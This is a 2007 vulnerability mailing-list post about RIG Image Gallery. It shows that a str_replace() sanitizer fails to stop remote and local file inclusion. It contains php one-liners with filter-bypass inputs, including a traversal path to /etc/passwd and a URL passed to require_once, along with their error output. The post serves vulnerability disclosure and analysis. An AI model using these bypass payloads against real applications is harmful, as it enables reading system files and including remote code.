[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
ascii
ascii at katamail.com
Tue Jul 31 15:09:41 UTC 2007
George A. Theall wrote:
> But regardless, the str_replace() later on in rig_check_src_file()
> would certainly void the possibility of a remote file include attack.
I'm not saying that the product is vulnerable but that this statement
is completely flawed, rig_check_src_file() is mostly useless (assumption
taken from the George's code snippet, I haven't downloaded the original
script).
function rig_check_src_file($name) {
...
$name = str_replace("..", ".", str_replace("://", "", $name));
...
return $name;
}
This alone permits both local and remote file inclusions:
Example a) Remote file inclusion
php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".",
str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
http://www.tin.it/
Warning: require_once(): URL file-access is disabled in the server
configuration in Command line code on line 1
Warning: require_once(http://www.tin.it/): failed to open stream: no
suitable wrapper could be found in Command line code on line 1
Fatal error: require_once(): Failed opening required
'http://www.tin.it/' (include_path='.:/usr/share/php5:/usr/share/php')
in Command line code on line 1
Example b) Local file inclusion
php -r '$name=".../.../.../etc/passwd"; $name = str_replace("..", ".",
str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
../../../etc/passwd
Warning: require_once(../../../etc/passwd): failed to open stream: No
such file or directory in Command line code on line 1
Fatal error: require_once(): Failed opening required
'../../../etc/passwd' (include_path='.:/usr/share/php5:/usr/share/php')
in Command line code on line 1
Best regards,
Francesco `ascii` Ongaro
http://www.ush.it/
More information about the VIM
mailing list